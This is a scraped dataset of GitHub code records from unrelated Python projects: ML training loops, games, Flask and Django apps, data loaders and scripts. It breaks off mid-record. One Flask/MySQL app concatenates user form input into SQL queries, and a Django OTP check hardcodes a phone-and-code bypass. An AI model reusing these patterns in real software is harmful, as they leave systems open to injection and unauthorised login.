loss_disc_lat = self.latency_coeff_curr * torch.relu(torch.Tensor([elapsed_time]).cuda() - self.target_latency)\n loss_cont_lat = self.latency_coeff_curr * torch.relu(latency_cont[0] - self.target_latency)\n\n # collect latency information\n self.latency_pred_loss.update(utils.reduce_tensor(surrogate_loss.data, self.args.world_size))\n self.latency_value.update(elapsed_time)\n\n self.latency_actual.append(elapsed_time)\n self.latency_estimate.append(latency_discrete.squeeze(1).data.cpu().numpy()[0])\n\n if global_step % 50 == 0:\n self.logging.info('latency_pred_loss %f' % np.mean(np.abs(np.array(self.latency_actual)[-50:] - np.array(self.latency_estimate)[-50:])))\n\n # saving some latency info\n if global_step % 1000 == 100 and self.args.local_rank == 0:\n import pickle\n print('saving')\n with open(os.path.join(self.args.save, 'latency.pkl'), 'wb') as f:\n pickle.dump([self.latency_actual, self.latency_estimate, global_step], f)\n\n reward = (loss_disc_lat - loss_cont_lat).detach()\n log_q_d = self.alpha.module.log_prob(weight_lat)\n loss = loss + torch.mean(log_q_d * reward) + torch.mean(loss_cont_lat)\n\n elif self.meta_loss == 'reinforce':\n # compute loss with discrete weights\n with torch.no_grad():\n disc_weights = self.alpha.module.discretize(weights)\n loss_disc, accuracy, loss1, loss2 = self.training_obj(input_valid, target_valid, disc_weights,\n model_opt, input_valid2, target_valid2,\n global_step)\n\n reduce_loss_disc = utils.reduce_tensor(loss_disc.data, self.args.world_size)\n avg = torch.mean(reduce_loss_disc).detach()\n baseline = self.exp_avg1.avg\n # update the moving average\n self.exp_avg1.update(avg)\n reward = (loss_disc - baseline).detach()\n log_q_d = self.alpha.module.log_prob(weights)\n loss = torch.mean(log_q_d * reward) + baseline\n loss1, loss2 = torch.mean(loss1), torch.mean(loss2)\n\n if self.latency_cost:\n weight_lat = self.alpha(1)\n disc_weights_lat = self.alpha.module.discretize(weights)\n elapsed_time = self.compute_latency(input_valid, disc_weights_lat)\n self.latency_coeff_curr = self.latency_coeff * min(global_step / self.args.latency_iter, 1.0)\n loss_disc_lat = self.latency_coeff_curr * elapsed_time\n self.latency_value.update(elapsed_time)\n\n baseline = self.exp_avg2.avg\n # update the moving average\n self.exp_avg2.update(float(loss_disc_lat))\n reward = loss_disc_lat - baseline\n log_q_d = self.alpha.module.log_prob(weight_lat)\n loss = loss + torch.mean(log_q_d * reward) + baseline\n loss1, loss2 = torch.mean(loss1), torch.mean(loss2)\n\n entropy_loss = self.alpha.module.entropy_loss(weights)\n\n # Backward pass and update.\n loss.backward()\n self.arch_optimizer.step()\n # Logging.\n reduced_loss = utils.reduce_tensor(loss.data, self.args.world_size)\n accuracy = utils.reduce_tensor(accuracy, self.args.world_size)\n\n self.loss.update(to_python_float(reduced_loss), 1)\n self.accuracy.update(to_python_float(accuracy), 1)\n self.count += 1\n if self.count % self.report_freq == 0:\n self.logging.info('Meta Loss:%s %03d %e %f', self.meta_loss,\n self.count, self.loss.avg, self.accuracy.avg)\n self.writer.add_scalar('meta/loss', self.loss.avg, global_step)\n self.writer.add_scalar('meta/acc', self.accuracy.avg, global_step)\n self.writer.add_scalar('meta/lr', self.arch_optimizer.state_dict()['param_groups'][0]['lr'], global_step)\n self.writer.add_scalar('meta/entropy', entropy_loss, global_step)\n\n if self.gen_error_alpha:\n self.writer.add_scalar('meta/loss_val', loss1, global_step)\n self.writer.add_scalar('meta/loss_cov', loss2, global_step)\n self.writer.add_scalar('meta/loss_diff_sign', self.loss_diff_sign.avg, global_step)\n\n if self.latency_cost:\n self.writer.add_scalar('meta/latency_time', self.latency_value.avg, global_step)\n self.writer.add_scalar('meta/latency_prediction_loss', self.latency_pred_loss.avg, global_step)\n self.writer.add_scalar('meta/latency_coeff', self.latency_coeff_curr, global_step)\n","repo_name":"NVlabs/unas","sub_path":"unas.py","file_name":"unas.py","file_ext":"py","file_size_in_byte":14110,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"54"} +{"seq_id":"15718478395","text":"from cocos.batch import BatchNode\nfrom cocos.layer import Layer, director\nfrom cocos.sprite import Sprite\nimport cocos.collision_model as CollisionModel\nfrom app.logic.enemy import Enemy\nfrom app.logic.hud import HUD\nfrom app.logic.player import Player\nfrom app.scene.parallaxBackground import ParallaxBackground\n\nclass GameScene(Layer):\n def __init__(self, R):\n super(GameScene, self).__init__()\n self.R = R\n self.batch = BatchNode()\n self.collisionManager = CollisionModel.CollisionManagerBruteForce()\n #Main Background\n mainBack = Sprite(R._BACKGROUND[4])\n mainBack.position = (director._window_virtual_width/2, director._window_virtual_height/2)\n self.add(mainBack)\n #Parallax-BackGround\n self.add(ParallaxBackground((0,0,800,600), [R._BACKGROUND[1],R._BACKGROUND[1]], 16, 10))\n self.add(ParallaxBackground((0, 0, 800, 600), [R._BACKGROUND[2], R._BACKGROUND[2]], 4, 10))\n self.add(ParallaxBackground((0, 0, 800, 600), [R._BACKGROUND[3], R._BACKGROUND[3]], 2, 10))\n\n #Add Player\n self.PLAYER = Player()\n self.ENEMY = Enemy()\n self.HUD = HUD()\n\n #set Data\n self.PLAYER.set(self)\n self.ENEMY.set(self)\n self.HUD.set(self)\n\n #Add layers\n self.add(self.PLAYER)\n self.add(self.ENEMY)\n self.add(self.HUD)\n\n #Adding Batch to Layer\n self.add(self.batch)","repo_name":"bleedweedsuz/Endless-Shooter","sub_path":"app/scene/gameScene.py","file_name":"gameScene.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11530581550","text":"from game import *\n\n#Class for a database of chessgames\nclass Games:\n def __init__(self) -> None:\n self._games : list[Game] = []\n\n # Getters and setters\n @property\n def games(self):\n return self._games\n \n def addGame(self, game : Game):\n self._games.append(game)\n\n # Returns how many games are active after a given number of moves\n def howManyActive(self, moves: int) -> int:\n games = 0\n for g in self.games:\n if int(g.plyCount)//2 > moves:\n games += 1\n return games\n # Same for games where Stockfish played with white pieces\n def howManyActiveW(self, moves: int) -> int:\n games = 0\n for g in self.games:\n if int(g.plyCount)//2 > moves and g.white == \"Stockfish 15 64-bit\":\n games += 1\n return games\n # Same for games where Stockfish played with black pieces\n def howManyActiveB(self, moves: int) -> int:\n games = 0\n for g in self.games:\n if int(g.plyCount)//2 > moves and g.black == \"Stockfish 15 64-bit\":\n games += 1\n return games\n # Returns the max number of moves in a game in the database\n def maxMoves(self) ->int:\n max = 0\n for i in range(len(self.games)):\n if int(self.games[i].plyCount) > max:\n max = self.games[i].plyCount\n return max\n # Counts the openings, so that we can se which openings are most popular\n def countOpenings(self) -> dict:\n openings: dict = {}\n for g in self.games:\n if g.opening not in openings:\n openings[g.opening] = 1\n else:\n openings[g.opening] += 1\n sortedDict = dict(sorted(openings.items(), key=lambda item: item[1], reverse=True))\n return sortedDict\n","repo_name":"vwnorris/stockFishAnalyzer","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74268656162","text":"# Leetcode 977. Squares of a Sorted Array\n#\n# Link: https://leetcode.com/problems/squares-of-a-sorted-array/\n# Difficulty: Easy\n\n# Solution using TwoPointers\n# Complexity:\n# O(N) time | where N represent the number of elements in the input array\n# O(N) space | where N represent the number of elements in the input array\n\nclass Solution:\n def sortedSquares(self, nums: List[int]) -> List[int]:\n\n left, right, = 0, len(nums) - 1\n result = []\n\n while left <= right:\n if abs(nums[left]) > abs(nums[right]):\n result.append(nums[left]**2)\n left += 1\n else:\n result.append(nums[right]**2)\n right -= 1\n\n return result[::-1]\n","repo_name":"edab/LC-Study-Plan","sub_path":"solutions/squares-of-a-sorted-array.py","file_name":"squares-of-a-sorted-array.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15543429402","text":"from flask import current_app as app\nfrom flask import request, render_template\nfrom http import HTTPStatus\nfrom xbox.webapi.authentication.manager import AuthenticationManager,\\\n AuthenticationException, TwoFactorAuthRequired\nfrom . import routes\n\n\n@routes.route('/auth')\ndef authentication_overview():\n tokens = {\n 'access_token': app.authentication_mgr.access_token,\n 'refresh_token': app.authentication_mgr.refresh_token,\n 'user_token': app.authentication_mgr.user_token,\n 'xsts_token': app.authentication_mgr.xsts_token\n }\n\n data = {}\n for k, v in tokens.items():\n data.update({k: v.to_dict() if v else None})\n userinfo = app.authentication_mgr.userinfo.to_dict() if app.authentication_mgr.userinfo else None\n\n return app.success(tokens=data, userinfo=userinfo, authenticated=app.authentication_mgr.authenticated)\n\n\n@routes.route('/auth/login')\ndef authentication_login():\n if app.authentication_mgr.authenticated:\n return render_template('auth_result.html',\n title='Already signed in',\n result='Already signed in',\n message='You are already signed in, please logout first!',\n link_path='/auth/logout',\n link_title='Logout')\n else:\n return render_template('login.html')\n\n\n@routes.route('/auth/login', methods=['POST'])\ndef authentication_login_post():\n is_webview = request.form.get('webview')\n email_address = request.form.get('email')\n password = request.form.get('password')\n\n if app.authentication_mgr.authenticated:\n return app.error('An account is already signed in.. please logout first', HTTPStatus.BAD_REQUEST)\n elif not email_address or not password:\n return app.error('No email or password parameter provided', HTTPStatus.BAD_REQUEST)\n\n app.authentication_mgr.email_address = email_address\n app.authentication_mgr.password = password\n\n try:\n app.authentication_mgr.authenticate()\n app.authentication_mgr.dump(app.token_file)\n except AuthenticationException as e:\n if is_webview:\n return render_template('auth_result.html',\n title='Login fail',\n result='Login failed',\n message='Error: {0}!'.format(str(e)),\n link_path='/auth/login',\n link_title='Try again')\n else:\n return app.error('Login failed! Error: {0}'.format(str(e)),\n two_factor_required=False)\n\n except TwoFactorAuthRequired:\n if is_webview:\n return render_template('auth_result.html',\n title='Login fail',\n result='Login failed, 2FA required',\n message='Please click the following link to authenticate via OAUTH',\n link_path='/auth/oauth',\n link_title='Login via OAUTH')\n else:\n return app.error('Login failed, 2FA required!',\n two_factor_required=True)\n\n except Exception as e:\n return app.error('Unhandled authentication error: {0}'.format(str(e)),\n two_factor_required=False)\n\n if is_webview:\n return render_template('auth_result.html',\n title='Login success',\n result='Login succeeded',\n message='Welcome {}!'.format(app.logged_in_gamertag),\n link_path='/auth/logout',\n link_title='Logout')\n else:\n return app.success(message='Login success', gamertag=app.logged_in_gamertag)\n\n\n@routes.route('/auth/logout')\ndef authentication_logout():\n if app.authentication_mgr.authenticated:\n return render_template('logout.html', username=app.logged_in_gamertag)\n else:\n return render_template('auth_result.html',\n title='Logout failed',\n result='Logout failed',\n message='You are currently not logged in',\n link_path='/auth/login',\n link_title='Login')\n\n\n@routes.route('/auth/logout', methods=['POST'])\ndef authentication_logout_post():\n is_webview = request.form.get('webview')\n username = app.logged_in_gamertag\n app.reset_authentication()\n if is_webview:\n return render_template('auth_result.html',\n title='Logout success',\n result='Logout succeeded',\n message='Goodbye {0}!'.format(username),\n link_path='/auth/login',\n link_title='Login')\n else:\n return app.success(message='Logout succeeded')\n\n\n@routes.route('/auth/url')\ndef authentication_get_auth_url():\n return app.success(authorization_url=AuthenticationManager.generate_authorization_url())\n\n\n@routes.route('/auth/oauth')\ndef authentication_oauth():\n if app.authentication_mgr.authenticated:\n return render_template('auth_result.html',\n title='Already signed in',\n result='Already signed in',\n message='You are already signed in, please logout first!',\n link_path='/auth/logout',\n link_title='Logout')\n else:\n return render_template('login_oauth.html',\n oauth_url=AuthenticationManager.generate_authorization_url())\n\n\n@routes.route('/auth/oauth', methods=['POST'])\ndef authentication_oauth_post():\n is_webview = request.form.get('webview')\n app.reset_authentication()\n redirect_uri = request.form.get('redirect_uri')\n if not redirect_uri:\n return app.error('Please provide redirect_url', HTTPStatus.BAD_REQUEST)\n\n try:\n access, refresh = AuthenticationManager.parse_redirect_url(redirect_uri)\n app.authentication_mgr.access_token = access\n app.authentication_mgr.refresh_token = refresh\n app.authentication_mgr.authenticate(do_refresh=False)\n app.authentication_mgr.dump(app.token_file)\n except Exception as e:\n if is_webview:\n return render_template('auth_result.html',\n title='Login fail',\n result='Login failed',\n message='Error message: {0}'.format(str(e)),\n link_path='/auth/login',\n link_title='Try again')\n else:\n return app.error('Login failed, error: {0}'.format(str(e)))\n\n if is_webview:\n return render_template('auth_result.html',\n title='Login success',\n result='Login succeeded',\n message='Welcome {}!'.format(app.logged_in_gamertag),\n link_path='/auth/logout',\n link_title='Logout')\n else:\n return app.success(message='Login success', gamertag=app.logged_in_gamertag)\n\n\n@routes.route('/auth/refresh')\ndef authentication_refresh():\n try:\n app.authentication_mgr.authenticate(do_refresh=True)\n except Exception as e:\n return app.error(str(e))\n\n return app.success()\n\n\n@routes.route('/auth/load')\ndef authentication_load_from_disk():\n try:\n app.authentication_mgr.load(app.token_file)\n except FileNotFoundError as e:\n return app.error('Failed to load tokens from \\'{0}\\'. Error: {1}'.format(e.filename, e.strerror), HTTPStatus.NOT_FOUND)\n\n return app.success()\n\n\n@routes.route('/auth/store')\ndef authentication_store_on_disk():\n if not app.authentication_mgr.authenticated:\n return app.error('Sorry, no valid authentication for saving was found', HTTPStatus.BAD_REQUEST)\n\n try:\n app.authentication_mgr.dump(app.token_file)\n except Exception as e:\n return app.error('Failed to save tokens to \\'{0}\\'. Error: {1}'.format(app.token_file, str(e)))\n\n return app.success()\n","repo_name":"hixio-mh/xbox-smartglass-core-python","sub_path":"xbox/rest/routes/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"71587108001","text":"import collections\n\nimport dgl\nfrom dgl.data import PPIDataset\n\nfrom torch.utils.data import DataLoader, Dataset\n\n# implement the collate_fn for dgl graph data class\nPPIBatch = collections.namedtuple(\"PPIBatch\", [\"graph\", \"label\"])\n\n\ndef batcher(device):\n def batcher_dev(batch):\n batch_graphs = dgl.batch(batch)\n return PPIBatch(\n graph=batch_graphs, label=batch_graphs.ndata[\"label\"].to(device)\n )\n\n return batcher_dev\n\n\n# add a fresh \"self-loop\" edge type to the untyped PPI dataset and prepare train, val, test loaders\ndef load_PPI(batch_size=1, device=\"cpu\"):\n train_set = PPIDataset(mode=\"train\")\n valid_set = PPIDataset(mode=\"valid\")\n test_set = PPIDataset(mode=\"test\")\n # for each graph, add self-loops as a new relation type\n # here we reconstruct the graph since the schema of a heterograph cannot be changed once constructed\n for i in range(len(train_set)):\n g = dgl.heterograph(\n {\n (\"_N\", \"_E\", \"_N\"): train_set[i].edges(),\n (\"_N\", \"self\", \"_N\"): (\n train_set[i].nodes(),\n train_set[i].nodes(),\n ),\n }\n )\n g.ndata[\"label\"] = train_set[i].ndata[\"label\"]\n g.ndata[\"feat\"] = train_set[i].ndata[\"feat\"]\n g.ndata[\"_ID\"] = train_set[i].ndata[\"_ID\"]\n g.edges[\"_E\"].data[\"_ID\"] = train_set[i].edata[\"_ID\"]\n train_set.graphs[i] = g\n for i in range(len(valid_set)):\n g = dgl.heterograph(\n {\n (\"_N\", \"_E\", \"_N\"): valid_set[i].edges(),\n (\"_N\", \"self\", \"_N\"): (\n valid_set[i].nodes(),\n valid_set[i].nodes(),\n ),\n }\n )\n g.ndata[\"label\"] = valid_set[i].ndata[\"label\"]\n g.ndata[\"feat\"] = valid_set[i].ndata[\"feat\"]\n g.ndata[\"_ID\"] = valid_set[i].ndata[\"_ID\"]\n g.edges[\"_E\"].data[\"_ID\"] = valid_set[i].edata[\"_ID\"]\n valid_set.graphs[i] = g\n for i in range(len(test_set)):\n g = dgl.heterograph(\n {\n (\"_N\", \"_E\", \"_N\"): test_set[i].edges(),\n (\"_N\", \"self\", \"_N\"): (\n test_set[i].nodes(),\n test_set[i].nodes(),\n ),\n }\n )\n g.ndata[\"label\"] = test_set[i].ndata[\"label\"]\n g.ndata[\"feat\"] = test_set[i].ndata[\"feat\"]\n g.ndata[\"_ID\"] = test_set[i].ndata[\"_ID\"]\n g.edges[\"_E\"].data[\"_ID\"] = test_set[i].edata[\"_ID\"]\n test_set.graphs[i] = g\n\n etypes = train_set[0].etypes\n in_size = train_set[0].ndata[\"feat\"].shape[1]\n out_size = train_set[0].ndata[\"label\"].shape[1]\n\n # prepare train, valid, and test dataloaders\n train_loader = DataLoader(\n train_set,\n batch_size=batch_size,\n collate_fn=batcher(device),\n shuffle=True,\n )\n valid_loader = DataLoader(\n valid_set,\n batch_size=batch_size,\n collate_fn=batcher(device),\n shuffle=True,\n )\n test_loader = DataLoader(\n test_set,\n batch_size=batch_size,\n collate_fn=batcher(device),\n shuffle=True,\n )\n return train_loader, valid_loader, test_loader, etypes, in_size, out_size\n","repo_name":"dmlc/dgl","sub_path":"examples/pytorch/GNN-FiLM/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"13108134672","text":"import unittest\n\n\"\"\"\nGraph must be a DAG (directed acyclic graph), basically a directed graph with no cycle\n1. Start with a random node in graph\n2. Go to the end of the path that starts from above node. If current node has no un-visited adjacent nodes then add it \nto the stack. Doing this will make sure node that has no dependent nodes on it is added to stack.\n3. Repeat step 1, 2 until no un-visited nodes\n4. Return reversed stack\n\"\"\"\n\n\nclass Graph:\n def __init__(self):\n self.adj_list = {}\n\n def add_edge(self, u, v):\n if u not in self.adj_list.keys():\n self.adj_list[u] = []\n\n self.adj_list[u].append(v)\n\n def add_vertex(self, u):\n self.adj_list[u] = []\n\n def topological_sort(self):\n visited = set()\n stack = []\n\n for node in self.adj_list.keys():\n if node not in visited:\n self.helper(visited, stack, node)\n\n stack.reverse()\n\n return stack\n\n def helper(self, visited, stack, node):\n visited.add(node)\n # DFS traversal\n if node in self.adj_list.keys():\n for adj_node in self.adj_list[node]:\n if adj_node not in visited:\n self.helper(visited, stack, adj_node)\n\n # when all adjacent nodes are visited, add it to stack\n stack.append(node)\n\n\nclass Test(unittest.TestCase):\n\n def test_topological_sort(self):\n graph = Graph()\n graph.add_edge(\"G\", \"H\")\n graph.add_edge(\"A\", \"H\")\n graph.add_edge(\"A\", \"B\")\n graph.add_edge(\"B\", \"C\")\n graph.add_edge(\"C\", \"F\")\n graph.add_edge(\"D\", \"E\")\n graph.add_edge(\"E\", \"F\")\n graph.add_vertex(\"I\")\n expected_result = [\"I\", \"D\", \"E\", \"A\", \"B\", \"C\", \"F\", \"G\", \"H\"]\n self.assertEqual(graph.topological_sort(), expected_result,\n \"Should return correct result for string topological sort\")\n\n graph1 = Graph()\n graph1.add_edge(5, 0)\n graph1.add_edge(5, 2)\n graph1.add_edge(2, 3)\n graph1.add_edge(3, 1)\n graph1.add_edge(4, 0)\n graph1.add_edge(4, 1)\n expected_result_1 = [4, 5, 2, 3, 1, 0]\n self.assertEqual(graph1.topological_sort(), expected_result_1,\n \"Should return correct result for number topological sort\")\n","repo_name":"DKNY1201/programming-python","sub_path":"Sorting/TopologicalSort.py","file_name":"TopologicalSort.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26504859290","text":"# -*-coding:Utf-8 -*-\n\nclass Position():\n\t\"\"\" ligne et colonne de l'élément.\n\t(0, 0) est le coin en haut à gauche\"\"\"\n\tdef __init__(self, ligne, colonne):\n\t\tself.ligne = ligne\n\t\tself.colonne = colonne\n\n\tdef __repr__(self):\n\t\treturn \"({}, {})\".format(self.ligne, self.colonne)\n\n\tdef add(self, direction):\n\t\t\"\"\"Just for fun.\n\t\tUsage : position.add(\"n\")\"\"\"\n\t\tif direction == \"n\":\n\t\t\tself.ligne -= 1\n\t\telif direction == \"s\":\n\t\t\tself.ligne += 1\n\t\telif direction == \"e\":\n\t\t\tself.colonne += 1\n\t\telif direction == \"o\":\n\t\t\tself.colonne -= 1","repo_name":"kerhuon/robot1","sub_path":"position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2324758638","text":"import datetime\nimport logging\n\nfrom .models import UserCode\nimport random\nfrom .enums import StatusUserCode\nfrom ..models import User\n\n\nclass CreateUserCodeAction:\n\n @staticmethod\n def run(user):\n return UserCode.objects.create(user=user, otp=random.randint(1000, 9999))\n\n\nclass GetStatusUserCodeAction:\n\n @staticmethod\n def run(user: User, otp: str):\n otp_object = UserCode.objects.filter(user=user,\n otp=otp).order_by('created_at').last()\n\n if user.phone == '77777777777' and otp == '7899':\n return StatusUserCode.SUCCESS\n\n if otp_object is not None:\n try:\n now = datetime.datetime.now(datetime.timezone.utc)\n created_at = otp_object.created_at\n difference = now - created_at\n minutes = difference.total_seconds() / 60\n if minutes < 5:\n return StatusUserCode.SUCCESS\n else:\n return StatusUserCode.TIMEOUT\n\n except Exception as e:\n logging.exception(e)\n return StatusUserCode.INVALID_CODE\n else:\n return StatusUserCode.NOT_CREATED\n","repo_name":"BakdauletBolat/taxiback","sub_path":"apps/users/usercode/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15475762319","text":"from flask import Flask, render_template, request\r\nfrom flask_mysqldb import MySQL\r\n\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['MYSQL_HOST']='localhost'\r\napp.config['MYSQL_USER']='root'\r\napp.config['MYSQL_PASSWORD']=''\r\napp.config['MYSQL_DB']='artgallery'\r\n\r\nmysql = MySQL(app)\r\n \r\n@app.route('/')\r\ndef root():\r\n return render_template('index.html')\r\n\r\n@app.route('/display',methods=['GET', 'POST'])\r\ndef display():\r\n if request.method == \"POST\":\r\n details = request.form\r\n state = details['stateAb']\r\n cur = mysql.connection.cursor()\r\n cur.execute(\"SELECT C.* FROM CUSTOMER AS C, STATE AS S WHERE S.stateAb=C.stateAb AND S.stateAb='\"+state+\"'\")\r\n result = cur.fetchall()\r\n mysql.connection.commit()\r\n cur.close()\r\n return render_template('display.html',result= result)\r\n\r\n@app.route('/insert', methods = ['GET', 'POST'])\r\ndef insert():\r\n if request.method == \"POST\":\r\n details = request.form\r\n stateab = details['stateab']\r\n state = details['statename']\r\n cur = mysql.connection.cursor()\r\n cur.execute(\"INSERT INTO state(stateAb, stateName) VALUES(%s, %s)\",(stateab, state))\r\n mysql.connection.commit()\r\n cur.close()\r\n return 'success'\r\n return render_template('index.html')\r\n\r\n@app.route('/update', methods = ['GET', 'POST'])\r\ndef update():\r\n if request.method == 'POST':\r\n details = request.form\r\n stateab = details['stateab']\r\n state = details['statename']\r\n cur = mysql.connection.cursor()\r\n cur.execute(\"UPDATE state SET stateAb='\"+stateab+\"' WHERE stateName='\"+state+\"'\")\r\n mysql.connection.commit()\r\n cur.close()\r\n return 'success'\r\n return render_template('index.html')\r\n\r\n@app.route('/delete', methods = ['GET', 'POST'])\r\ndef delete():\r\n if request.method == 'POST':\r\n details = request.form\r\n state = details['statename']\r\n cur = mysql.connection.cursor()\r\n cur.execute(\"DELETE FROM state WHERE stateName='\"+state+\"'\")\r\n mysql.connection.commit()\r\n cur.close()\r\n return 'success'\r\n return render_template('index.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n\r\n","repo_name":"SumaitaSabaha/Database","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24531491364","text":"import os\nimport django\nimport json\nfrom pathlib import Path\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"hw10_project.settings\")\ndjango.setup()\n\nfrom quotes.models import Quote, Tag, Author\n\ndef load_json(filename):\n with open(filename, \"r\", encoding='utf-8') as file:\n data = json.load(file)\n return data\n\ndef load_data():\n a_list = {}\n pathname = Path(__file__).resolve().parent\n authors = load_json(pathname.joinpath('data/authors.json'))\n for auth in authors:\n fn = auth.get(\"fullname\")\n bd = auth.get(\"born_date\")\n author, *_ = Author.objects.get_or_create(\n fullname = fn,\n born_date = bd,\n born_location = auth.get(\"born_location\"),\n description = auth.get(\"description\")\n )\n a_list.update({fn: author})\n \n quotes = load_json(pathname.joinpath('data/quotes.json'))\n for quot in quotes:\n tags = []\n for tag in quot.get('tags'):\n t, *_ = Tag.objects.get_or_create(name=tag)\n tags.append(t)\n\n q1 = quot.get(\"quote\")\n exists_quote = bool(len(Quote.objects.filter(quote=q1)))\n if not exists_quote:\n auth = a_list.get(quot.get(\"author\"))\n quote = Quote.objects.create(\n quote = q1,\n author = auth\n )\n for tag in tags:\n quote.tags.add(tag)\n\n\nif __name__ == '__main__':\n load_data()\n","repo_name":"NikYurchik/Tutorial","sub_path":"DZ2-10/hw10_project/utils/migration.py","file_name":"migration.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72999008803","text":"import pygame\nimport sys\n\n\ndef update_score(ball, bar, score):\n \"\"\"This is check the score and increase it every time the bar and ball touch\"\"\"\n if bar.y <= ball.y <= (bar.y + bar.height):\n if ball.x <= bar.x < (ball.x + ball.radius) or bar.x <= ball.x < (bar.x + bar.width):\n score += 1\n return score\n\n\ndef check_events(bar):\n \"\"\"This will be the main checker of user input and make the necessary adjustments to the bar\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT:\n bar.moving_right = True\n elif event.key == pygame.K_LEFT:\n bar.moving_left = True\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_RIGHT:\n bar.moving_right = False\n elif event.key == pygame.K_LEFT:\n bar.moving_left = False\n","repo_name":"FruitPunchSamurai1961/Breakout_Game","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34346658386","text":"import pandas as pd\nimport warnings\nimport xlsxwriter\n\n\nwarnings.filterwarnings('ignore')\n\n\ndef read_excel(excel_path: str) -> pd.core.frame.DataFrame:\n df = pd.read_excel(excel_path)\n extracted_data = df.ix[:, [\"受试者\", '图像数据ID', '组别', '性别', '年龄', '获取日期', '受教育程度', '婚姻状况', 'APOE4', '简易精神状态检查表MMSE']]\n # , '问答情况FAQ'\n return extracted_data\n\n\ndef write_excel(excel_path: str, save_data: pd.core.frame.DataFrame):\n # file = xlwt.Workbook()\n # sheet = file.add_sheet('ADClinical', cell_overwrite_ok=True)\n # row0 = [\"受试者\", '图像ID', '组别', '性别', '年龄', '获取日期', '受教育程度', '婚姻状况', 'APOE4', '简易精神状态检查表MMSE', '问答情况FAQ']\n\n STYLE_HEADER = {'font_size': 9, 'border': 1, 'bold': 1, 'bg_color': '#B4C6E7', 'align': 'center',\n 'valign': 'vcenter'}\n STYLE_TEXT = {'font_size': 9, 'border': 1}\n STYLE_NUMBER = {'font_size': 9, 'border': 1, 'num_format': '0.00'}\n workbook = xlsxwriter.Workbook(excel_path)\n style_header = workbook.add_format(STYLE_HEADER)\n style_text = workbook.add_format(STYLE_TEXT)\n style_number = workbook.add_format(STYLE_NUMBER)\n AD_sheet = workbook.add_worksheet(\"ADClinical\")\n header = [\"受试者\", '图像数据ID', '组别', '性别', '年龄', '获取日期', '受教育程度', '婚姻状况', 'APOE4', '简易精神状态检查表MMSE']\n # , '问答情况FAQ'\n AD_sheet.write_row('A1', header, style_header)\n # 宽度设定\n widths = [15, 15, 15, 15, 15, 15, 15, 15, 15, 15]\n for ind, wid in enumerate(widths):\n AD_sheet.set_column(ind, ind, wid)\n for i in range(len(save_data)):\n AD_sheet.write(i + 1, 0, save_data.iloc[i, 0], style_number)\n AD_sheet.write(i + 1, 1, save_data.iloc[i, 1], style_number)\n AD_sheet.write(i + 1, 2, save_data.iloc[i, 2], style_text)\n AD_sheet.write(i + 1, 3, save_data.iloc[i, 3], style_text)\n AD_sheet.write(i + 1, 4, save_data.iloc[i, 4], style_number)\n AD_sheet.write(i + 1, 5, save_data.iloc[i, 5], style_number)\n AD_sheet.write(i + 1, 6, save_data.iloc[i, 6], style_number)\n AD_sheet.write(i + 1, 7, save_data.iloc[i, 7], style_text)\n AD_sheet.write(i + 1, 8, save_data.iloc[i, 8], style_number)\n AD_sheet.write(i + 1, 9, save_data.iloc[i, 9], style_number)\n workbook.close()\n\n\nif __name__ == '__main__':\n path = r\"D:\\data\\clinicalData\\fromZJ.xlsx\"\n write_path = r\"D:\\data\\clinicalData\\clinicalData.xlsx\"\n data = read_excel(path)\n write_excel(write_path, data)\n # write(write_path)\n","repo_name":"ETVP/AD-diagnosis","sub_path":"ori/excelExtract.py","file_name":"excelExtract.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"20067067836","text":"N = int(input())\n\nlist = []\ntenho = 0\n\nfor i in range(N):\n S = input()\n\n if(S in list):\n tenho += 1\n else:\n list.append(S)\n\n\n print(list)\n\nprint(f'Falta(m) {151-len(list)} pomekon(s).')\n","repo_name":"OrnanKeivison/ProvaTalAlgoritmos","sub_path":"Questao3.py","file_name":"Questao3.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3643455695","text":"'''\n(Count positive and negative numbers and compute the average of numbers)\n\nWrite a program that reads an unspecified number of integers, determines how many positive and negative values have been read, and computes the total and average of the input values (not counting zeros). Your program ends with the input 0. Display the average as a floating-point number.\n\nSample Run 1\n\nSample Output 